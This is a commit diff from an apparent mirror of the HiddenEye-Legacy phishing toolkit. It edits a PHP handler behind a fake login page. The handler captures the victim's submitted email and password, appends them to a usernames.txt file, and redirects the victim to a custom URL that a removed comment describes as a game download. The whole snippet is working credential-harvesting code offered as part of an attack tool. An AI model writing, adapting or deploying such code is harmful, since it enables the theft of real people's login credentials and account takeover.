mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
parent
3d8b400ddb
commit
61cba860fc
|
@ -4,15 +4,9 @@ include 'ip.php';
|
|||
|
||||
$pass = $_POST["password"];
|
||||
$email=$_SESSION["Email"];
|
||||
//opening logins text file for appending new data.
|
||||
$file = fopen("usernames.txt", "a") or die("Unable to open file!");
|
||||
|
||||
//Writing email and password to logins.txt.
|
||||
fwrite($file, "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass .FILE_APPEND);
|
||||
fclose($file);//closing logins.txt.
|
||||
|
||||
//redirecting user to the google drive's locations where the game is available to download.
|
||||
//change the location url to redirect to a website of your choice.
|
||||
file_put_contents("usernames.txt", "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass . "\n", FILE_APPEND);
|
||||
header('Location: <CUSTOM>');
|
||||
exit();
|
||||
|
||||
|
|
Loading…
Reference in New Issue
Block a user